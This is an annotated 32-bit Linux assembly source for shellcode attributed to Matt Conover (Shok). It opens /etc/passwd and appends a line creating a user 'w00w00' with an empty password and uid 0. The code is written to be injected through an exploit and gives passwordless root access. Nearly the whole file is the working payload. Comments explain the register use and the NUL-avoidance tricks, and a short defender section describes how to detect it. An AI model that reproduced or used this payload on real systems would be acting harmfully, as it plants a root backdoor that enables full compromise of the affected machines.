# Source to pass.c (shell code to append a root line to the passwd file)
# Shok (Matt Conover), shok@dataforce.net
#
# Target/ABI: 32-bit Linux, GAS AT&T syntax, raw int $0x80 system calls
#   (%eax = syscall number, %ebx/%ecx/%edx = args 1..3, result in %eax).
# The code is position independent: the jmp/call/popl sequence below loads
# the run-time address of the label w0w0w into %edi, and every data
# reference is then formed as %edi + (label - w0w0w).  Constants are built
# with xor followed by byte/word moves, presumably so the encoded bytes
# contain no NUL (an assumption about intent; the page does not say so).
#
# Register roles:
#   %edi  address of w0w0w, constant for the whole payload
#   %ebx  pointer to the filename, then the descriptor returned by open
#   %ecx  open flags, then pointer to the line that is written
#   %edx  file mode, then byte count for write
#   %eax  syscall number / return value
#
# Defender notes: the observable behaviour is an open(2) of /etc/passwd with
# O_WRONLY|O_APPEND|O_CREAT followed by one write(2) of a passwd line whose
# password field is empty and whose uid and gid are both 0.  An audit or
# file-integrity watch on /etc/passwd, together with a periodic check for
# any entry other than root with uid 0 or with an empty password field,
# catches this class of payload independently of the exact bytes used.
        jmp     call_w00w00
w00w00:
        popl    %edi                    # %edi = address pushed by the call below = w0w0w
        jmp     w0w0w
call_w00w00:
        call    w00w00                  # pushes the address of the next instruction (w0w0w)
w0w0w:
# OPEN
# ecx=flag (O_RDONLY, O_WRONLY, ...)
# O_WRONLY | O_APPEND | O_CREAT = 0x441
# edx=file mode
# ebx=address of filename
# eax=0x05 syscall number
        xorl    %ebx,%ebx
        movb    $(file-w0w0w),%bl       # byte offset of the filename from w0w0w (assumed < 256)
        addl    %edi,%ebx               # %ebx = &file
        xorb    %al,%al
        movb    %al,11(%ebx)            # offset 11 = strlen("/etc/passwd"): overwrite the .byte 1 at endfile with 0 so the path is NUL-terminated at run time
        xorl    %ecx,%ecx
        movw    $0x441,%cx              # O_WRONLY|O_APPEND|O_CREAT
        xorl    %edx,%edx
        movw    $00644,%dx              # mode argument for O_CREAT, 0644 (octal literal)
        xorl    %eax,%eax
        movb    $0x5,%al                # SYS_open
        int     $0x80
        movl    %eax,%ebx               # save file descriptor to %ebx (for write); the value is used unchecked, so a negative errno would be passed on as the fd
# WRITE
# ecx=address of buffer to write
# edx=number of bytes to write
# ebx=file descriptor
# eax=0x04
        xorl    %ecx,%ecx
        movb    $(string-w0w0w),%cl     # byte offset of the line to append from w0w0w (assumed < 256)
        addl    %edi,%ecx               # %ecx = &string
        xorl    %edx,%edx
        movb    $31,%dl                 # byte count handed to write, as coded
        xorl    %eax,%eax
        movb    $0x04,%al               # SYS_write
        int     $0x80
# EXIT: no close, no return-value check; %ebx (the descriptor) becomes the exit status
        xorl    %eax,%eax
        movb    $1,%al                  # SYS_exit
        int     $0x80
file:
        .ascii  "/etc/passwd"
endfile:
        .byte   1                       # placeholder terminator, replaced by 0 at run time (see movb %al,11(%ebx) above)
string:
        .ascii  "w00w00::0:0:w0w0w!:/:/bin/sh\n"